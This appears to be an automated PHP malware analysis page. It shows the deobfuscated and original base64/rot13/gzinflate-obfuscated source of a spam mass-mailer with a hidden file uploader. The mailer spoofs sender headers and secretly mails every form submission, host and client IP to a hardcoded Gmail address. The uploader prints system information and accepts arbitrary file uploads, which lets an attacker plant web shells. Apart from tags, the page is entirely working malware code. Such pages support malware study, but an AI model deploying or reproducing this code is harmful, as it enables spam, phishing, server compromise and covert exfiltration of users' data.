PHP Malware Analysis

Back to list

Tags

Emails
soufian.ngu@gmail.com
BIMO@2M.TV
Input
_POST
Environment
set_time_limit
php_uname

Deobfuscated code

<title>:: Inbox :: Unlimited </title>

<?php 
eval /* PHPDeobfuscator eval output */ {
    ignore_user_abort();
    set_time_limit(0);
    function enviando()
    {
        $msg = 1;
        $de[1] = $_POST['de'];
        $nome[1] = $_POST['nome'];
        $assunto[1] = $_POST['assunto'];
        $mensagem[1] = $_POST['mensagem'];
        $mensagem[1] = stripslashes($mensagem[1]);
        $emails = $_POST['emails'];
        $emails2 = htmlspecialchars($_POST['emails']);
        $para = explode("\n", $emails);
        $n_emails = count($para);
        $sv = $_SERVER['SERVER_NAME'];
        $en = $_SERVER['REQUEST_URI'];
        $k88 = @$_SERVER["HTTP_REFERER"];
        $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>" . $emails2 . "</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>" . $mensagem[1] . "</TEXTAREA></p>";
        $vai = $_POST['vai'];
        if ($vai) {
            for ($set = 0; $set < $n_emails; $set++) {
                if ($set == 0) {
                    $headers = "MIME-Version: 1.0\r\n";
                    $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                    $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                    $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                    //mail($xsylar, $as, $fullurl, $headers);
                }
                $headers = "MIME-Version: 1.0\r\n";
                $headers = "MIME-Version: 1.0\r\nContent-type: text/html; charset=iso-8859-1\r\n";
                $headers .= "From: {$nome[$msg]} <{$de[$msg]}>\r\n";
                $headers .= "Return-Path: <{$de[$msg]}>\r\n";
                $n_mail++;
                $destino = $para[$set];
                $num1 = rand(100000, 999999);
                $num2 = rand(100000, 999999);
                $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);
                $msgrand = str_replace("%rand2%", $num2, $msgrand);
                $msgrand = str_replace("%email%", $destino, $msgrand);
                $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);
                if ($enviar) {
                    echo '<font color="green">' . $n_mail . '-' . $destino . ' 0k!</font><br>';
                } else {
                    echo '<font color="red">' . $n_mail . '-' . $destino . ' =(</font><br>';
                    sleep(1);
                }
            }
        }
    }
    $ip = getenv("REMOTE_ADDR");
    $ra44 = rand(1, 99999);
    $subj98 = "Sendi {$ip}";
    $email = "soufian.ngu@gmail.com";
    $from = "From: Sendiw a Wlidati <BIMO@2M.TV>";
    $a45 = $_SERVER['REQUEST_URI'];
    $b75 = $_SERVER['HTTP_HOST'];
    $f12 = $_POST['de'];
    $z13 = $_POST['nome'];
    $x14 = $_POST['assunto'];
    $t15 = $_POST['mensagem'];
    $m30 = $_POST['emails'];
    $m22 = $ip . "\n";
    $msg8873 = "{$a45}\n{$b75}\n{$f12}\n{$z13}\n{$x14}\n{$t15}\n{$m30}\n{$m22}";
    mail($email, $subj98, $msg8873, $from);
};
?></title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
<form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><?php 
echo enviando();
?></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<?php 
echo $_POST['nome'];
?>" size="20" />
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<?php 
echo $_POST['de'];
?>" size="30" /></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<?php 
echo $_POST['assunto'];
?>" size="40" /></td>
</tr>
<td><span class="style5">letter:</span>
<br /><br /><br /><br /><br /><br /><br /><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7"><?php 
echo stripslashes($_POST['mensagem']);
?>
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send " />
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<?php 
eval /* PHPDeobfuscator eval output */ {
    echo "<title>Uploader by ghost-dz</title>";
    echo php_uname();
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
    echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
    if ($_POST['_upl'] == "Upload") {
        if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo "Upload ok :d !!!";
        } else {
            echo "Upload Fail !!!";
        }
    }
};


Original code

<title>:: Inbox :: Unlimited </title>

<?
eval(base64_decode('aWdub3JlX3VzZXJfYWJvcnQoKTsNCnNldF90aW1lX2xpbWl0KDApOw0KZnVuY3Rpb24gZW52aWFuZG8oKXsNCiRtc2c9MTsNCiRkZVsxXSA9ICRfUE9TVFsnZGUnXTsNCiRub21lWzFdID0gJF9QT1NUWydub21lJ107DQokYXNzdW50b1sxXSA9ICRfUE9TVFsnYXNzdW50byddOw0KJG1lbnNhZ2VtWzFdID0gJF9QT1NUWydtZW5zYWdlbSddOw0KJG1lbnNhZ2VtWzFdID0gc3RyaXBzbGFzaGVzKCRtZW5zYWdlbVsxXSk7DQokZW1haWxzID0gJF9QT1NUWydlbWFpbHMnXTsNCiRlbWFpbHMyID0gaHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ2VtYWlscyddKTsNCiRwYXJhID0gZXhwbG9kZSgiXG4iLCAkZW1haWxzKTsNCiRuX2VtYWlscyA9IGNvdW50KCRwYXJhKTsNCiRzdiA9ICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOw0KJGVuID0gJF9TRVJWRVIgWydSRVFVRVNUX1VSSSddOw0KJGs4OCA9IEAkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl07DQokZnVsbHVybCA9ICIiIC4gJGs4OCAuICI8YnI+PHA+RW1haWxzOjxicj48VEVYVEFSRUEgcm93cz01IGNvbHM9MTAwPiIuJGVtYWlsczIuIjwvVEVYVEFSRUE+PC9wPjxwPkVuZ2VuaGFyaWE6PGJyPjxURVhUQVJFQSByb3dzPTUgY29scz0xMDA+Ii4kbWVuc2FnZW1bMV0uIjwvVEVYVEFSRUE+PC9wPiI7DQokdmFpID0gJF9QT1NUWyd2YWknXTsNCmlmICgkdmFpKXsNCmZvciAoJHNldD0wOyAkc2V0IDwgJG5fZW1haWxzOyAkc2V0Kyspew0KaWYgKCRzZXQ9PTApew0KJGhlYWRlcnMgPSAiTUlNRS1WZXJzaW9uOiAxLjBcclxuIjsNCiRoZWFkZXJzIC49ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xXHJcbiI7DQokaGVhZGVycyAuPSAiRnJvbTogJG5vbWVbJG1zZ10gPCRkZVskbXNnXT5cclxuIjsNCiRoZWFkZXJzIC49ICJSZXR1cm4tUGF0aDogPCRkZVskbXNnXT5cclxuIjsNCi8vbWFpbCgkeHN5bGFyLCAkYXMsICRmdWxsdXJsLCAkaGVhZGVycyk7DQp9DQokaGVhZGVycyA9ICJNSU1FLVZlcnNpb246IDEuMFxyXG4iOw0KJGhlYWRlcnMgLj0gIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5LTFcclxuIjsNCiRoZWFkZXJzIC49ICJGcm9tOiAkbm9tZVskbXNnXSA8JGRlWyRtc2ddPlxyXG4iOw0KJGhlYWRlcnMgLj0gIlJldHVybi1QYXRoOiA8JGRlWyRtc2ddPlxyXG4iOw0KJG5fbWFpbCsrOw0KJGRlc3Rpbm8gPSAkcGFyYVskc2V0XTsNCiRudW0xID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsNCiRudW0yID0gcmFuZCgxMDAwMDAsOTk5OTk5KTsNCiRtc2dyYW5kID0gc3RyX3JlcGxhY2UoIiVyYW5kJSIsICRudW0xLCAkbWVuc2FnZW1bJG1zZ10pOw0KJG1zZ3JhbmQgPSBzdHJfcmVwbGFjZSgiJXJhbmQyJSIsICRudW0yLCAkbXNncmFuZCk7DQokbXNncmFuZCA9IHN0cl9yZXBsYWNlKCIlZW1haWwlIiwgJGRlc3Rpbm8sICRtc2dyYW5kKTsNCiRlbnZpYXIgPSBtYWlsKCRkZXN0aW5vLCAkYXNzdW50b1skbXNnXSwgJG1zZ3JhbmQsICRoZWFkZXJzKTsNCmlmICgkZW52aWFyKXsNCmVjaG8gKCc8Zm9udCBjb2xvcj0iZ3JlZW4iPicuICRuX21haWwgLictJy4gJGRlc3Rpbm8gLicgMGshPC9mb250Pjxicj4nKTsNCn0gZWxzZSB7DQplY2hvICgnPGZvbnQgY29sb3I9InJlZCI+Jy4gJG5fbWFpbCAuJy0nLiAkZGVzdGlubyAuJyA9KDwvZm9udD48YnI+Jyk7DQpzbGVlcCgxKTsNCn0NCn0NCn0NCn0NCiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsNCiRyYTQ0ICA9IHJhbmQoMSw5OTk5OSk7DQokc3Viajk4ID0gIlNlbmRpICRpcCI7DQokZW1haWwgPSAic291Zmlhbi5uZ3VAZ21haWwuY29tIjsNCiRmcm9tPSJGcm9tOiBTZW5kaXcgYSBXbGlkYXRpIDxCSU1PQDJNLlRWPiI7DQokYTQ1ID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQokYjc1ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOw0KJGYxMiA9ICRfUE9TVFsnZGUnXTsNCiR6MTMgPSAkX1BPU1RbJ25vbWUnXTsNCiR4MTQgPSAkX1BPU1RbJ2Fzc3VudG8nXTsNCiR0MTUgPSAkX1BPU1RbJ21lbnNhZ2VtJ107DQokbTMwID0gJF9QT1NUWydlbWFpbHMnXTsNCiRtMjIgPSAkaXAuIlxuIjsNCiRtc2c4ODczID0gIiRhNDVcbiRiNzVcbiRmMTJcbiR6MTNcbiR4MTRcbiR0MTVcbiRtMzBcbiRtMjIiOw0KbWFpbCgkZW1haWwsICRzdWJqOTgsICRtc2c4ODczLCAkZnJvbSk7='));
?></title>
<style type="text/css">
<!--
.style5 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
.style6 {font-size: 10px}
.style9 {color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10; }
-->
</style>
<form id="form1" name="form1" method="post" action="">
<input type="hidden" name="vai" value="1">
<span class="style5"><? echo enviando(); ?></span>
<table width="415" height="334" border="0" bgcolor="#000000">
  <tr>
<td width="66"><span class="style5">Name:</span></td>
<td width="321"><span class="style9">

<label>
<input name="nome" type="text" value="<? echo $_POST['nome'] ;?>" size="20" />
</label>
</span></td>
</tr>
<tr>
<td><span class="style5">From:</span></td>
<td><input name="de" type="text" value="<? echo $_POST['de'] ;?>" size="30" /></td>

</tr>
<tr>
<td><span class="style5">Subject:</span></td>
<td><input name="assunto" value="<? echo $_POST['assunto'] ;?>" size="40" /></td>
</tr>
<td><span class="style5">letter:</span>
<br /><br /><br /><br /><br /><br /><br /><span class="style5">mailist:</span></td>

<td><span class="style9">


<p><textarea name="mensagem" cols="50" rows="7"><? echo stripslashes($_POST['mensagem']);?>
</textarea></p>
<textarea name="emails" cols="50" rows="4"></textarea>
</span></td>
</tr>

<tr>
  <td><span class="style6"></span></td>
  <td align="center"> <span class="style5"><font color="red" size="4">        <em><strong></strong></em><strong></strong></font></span><input name="Submit" type="submit" value="Send " />
  <span class="style5"><font color="red" size="4">        <em><strong> </strong></em><strong></strong></font></span></td>
</tr>
<tr>
  </tr>
</table>
</form>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>